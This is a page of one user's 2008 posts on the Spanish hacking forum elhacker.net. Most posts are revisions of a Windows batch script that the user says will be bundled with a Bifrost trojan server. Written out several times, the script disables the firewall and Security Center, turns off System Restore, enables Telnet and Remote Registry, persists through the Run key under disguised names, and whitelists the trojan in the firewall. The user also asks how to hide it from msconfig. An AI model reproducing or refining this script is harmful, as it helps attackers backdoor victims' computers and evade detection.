elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6
41  Programación / Scripting / Re: Comando AT (Batch) en: 22 Enero 2008, 17:05 pm
Schtasks mm pero osea lo que hace es programar algo en las tareas programadas. El at nunca lo entendi bien pero de lo que estoy seguro es que, cuando lo hagas lo va a ejecutar el dia siguiente. Ademas si no tienes privilegios vas a tener que aprender de algun post sobre escala de privilegios. Lo mejor si el otro no es Admin es jugar con el registro pero antes desactivando un servicio que no me acuerdo cual era. Sino como dice un usuario de aca arriba bucle lo que mejor podes hacer.
42  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 21 Enero 2008, 07:59 am
Osea que por ahora lo mejor que puedo hacer con el firewall es agregar una excepción. Es la unica forma que pasaria desadvertido pero desactivando el firewall de windows a mi personalmente no me aparece ningun cartel porque podra ser. Bueno por ahora sera agregar una excepcion con un nombre normal como entorno upnp pero si lo agrego con el mismo nombre en las excpeciones se va ver? o va a estar escondido en el mismo?. Otra duda mas que tengo es esta, si la persona ve en el msconfig el start del bat lo va a ver con la extension .bat? porque le podria poner el nombre de ctfmon que pasaria desapercibido. Pero si la persona saca el run, la proxima vez el .bat no se ejecutaria verdad? nose puede hacer un autocopy osea si la persona lo elimina volver a agregarlo al registro jeje. Por ahora estoy concentrado en lo del firewall para ver si lo podemos desactivar.
43  Media / Multimedia / Re: Sobre Youtube en: 20 Enero 2008, 09:44 am
Hay muchas formas  y programas para poder descargar de youtube y otras paginas. Solo hay que ponerse a buscar.
Saludos
44  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 20 Enero 2008, 08:30 am
Lo voy a adjuntar con un server de un troyano y lo que quiero hacer con esa parte es desabhilitar y desactivar el firewall de windows. En todo caso el .bat seri asi entonces.


Citar
Citar
Código:
@echo off
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v system32.bat /d %windir%\system32\1234\system32.bat /f
netsh firewall set opmode mode = DISABLE
net stop SharedAccess
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle

Asi compilado cuanto tardaria? Y asi el bat no da señal alguno verdad? Podrias ejecutarlo asi otra vez sino es mucha molestia?

agrege el bat al run desactive el firewall detengo el servicio de firewall y despues otra cosas. Cuando lo ejecutas asi se ve algo? algun mensaje de que se detuvo el firewall,etc. Ahora me pongo a ver acerca del comando ese para no ejecutar todo el bat otra vez. Pero.. que me recomendais ejecutar el bat asi? o acortarlo despues de ejecutar todo eso. A este bat lo voy a adjuntar con un server.

En todo caso si desabilito el firewall y detengo el servicio con esto quiere decir que va a aceptar todas las conexiones? por ejemplo la de un server. Porque en caso de que no sea asi tendria que agregarlo. seria algo asi suponiendo que el server esta en system32\bifrost

Citar
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "%windir%\system32\bifrost\server.exe" /t REG_SZ /d "%windir%\system32\bifrost\server.exe:*:Enabled:Asistencia Remota

PD: Cuando dices además de que con la tercera línea desactivas el firewall, entonces igual salta el mensaje. Donde salta el mensaje en el centro de seguridad? Yo en el batch agregue que el centro de seguridad este desactivado y el servicio detenido. Porque habria de saltar :P

Gracias por su ayuda realmente me estan ayudando un monton ! se los agradezco.  :-[
45  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 20 Enero 2008, 00:46 am
Aja ya vi un par de cosas.. creo que aca esta el bat supongo me gustaria saber si esta bien. Lei acerca del net y bueno por ahora creo que no lo voy a utilizar. Los archivos que me tomaban como infectado eran unas dll del quick batch compiler el stubc.dll o el otro que no me acuerdo.

Aca esta me decis si esta bien o mal.

Citar
Código:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v system32.bat /t REG_SZ /d " system32.bat:*:Enabled: MSN"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v system32.bat /d %windir%\system32\1234\system32.bat /f
netsh firewall set opmode mode = DISABLE
net stop SharedAccess
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /d 4 /f
net start AppMgmt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt" /v Start /d 4 /f
net start ProtectedStorage
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\ProtectedStorage" /v Start /d 2 /f
net start LmHosts
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\LmHosts" /v Start /d 2 /f
net stop wscsvc
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v Start /d 4 /f
net start RemoteRegistry
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\RemoteRegistry" /v Start /d 2 /f
net stop Srservice
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Srservice" /v Start /d 4 /f
net start TlnSvr
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\TlnSvr" /v Start /d 2 /f
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle

Me gustaria saber otra cosa al reiniciar se ejecuta otra vez el .bat pero solo quiero que de esa parte se ejecute el bucle por ejemplo. Otra cosa tardaria mucho en finalizar el .bat? lo compilo con el quick y no se va a ver ni la ventana ni la ventana del explorer tampoco jeje, pero me gustaria saber si tardaria mucho en ejecutar todo el bat.
46  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 19 Enero 2008, 00:39 am
Entonces seria asi :

Citar
Código:
@echo off
reg add HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
/v sys32.bat /t REG_SZ /d " sys32.bat:*:Enabled: Firewall"
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f
netsh firewall set opmode mode = DISABLE
net stop SharedAccess
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle

en donde dice Enabled: seria el nombre que se va a ver como excepciones? Nose podria poner uno que ya este? por ejemplo Entorno uPnP o escritorio remoto nose..
Lo voy a compilar con el quick batch compiler :D aunque los antivirus ya estan tomando una dll de este como herramienta maliciosa!. Y si no lo compilo con nada se va a ver la ventana msdos verdad?

PD: Encontre mas ideas para mejorar el batch solo quisiera saber como desabhilitar o habilitar los servicios. services.msc

Osea estado de inicio : como cambiarlo de iniciado a detenido y tipo de inicio como cambiarlo a automatico manual o desabilitarlo. Espero que me puedas ayudar asi termino mas o menos mi batch. Creo que encontre unos trucos muy pero muy utiles :D
47  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 18 Enero 2008, 05:08 am
Este script estaria bien_

Código:
Citar
@echo off
netsh firewall set opmode mode = DISABLE
pause
net stop SharedAccess
pause
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f
pause
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
48  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 16 Enero 2008, 16:15 pm
Paa  no entendi nada  :( pero bueno nose si pùede ir esto con lo que lei el Bifrost tiene ActiveX si le tiro random y agarro uno y la agrego pero nose como podria seguir haciendolo otra opcion seria esto?

reg add "hklm\software\microsoft\windows\currentversion\run" /v mibat.bat /d %windir%\system32\mibat.bat /f

pero si hago eso se veria en el msconfig? o en algun otro lado ademas? mi batch se llama sys32.exe y estaria alojado en %Windir%system32\1234\sys32.exe entonces el registro tendria que ser asi

Código:
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f

Supuestamente lo agrega al inicio de windows pero entonces donde seria visible por msconfig ? o por inicio de programas? o nose.
49  Programación / Scripting / Re: Como hacer funcionar este batch perfectamente? en: 15 Enero 2008, 23:58 pm
Una pregunta como haria para agregarlo al registro asi cuando se reinicia sigue ejecutandose.. ya que cuando por primera vez lo ejecuta y sigue bien pero al reiniciar ya no funcionaria mas no? Quiero que al reiniciar apagar el equipo,etc sigue funcionando jeje.
50  Programación / Scripting / Re: commando start (.bat) en: 12 Enero 2008, 21:28 pm
Nose porque a mi me pasa lo mismo el /B no funciona sera un error de windows? o estara mal aplicado ayudaaaa.
Páginas: 1 2 3 4 [5] 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines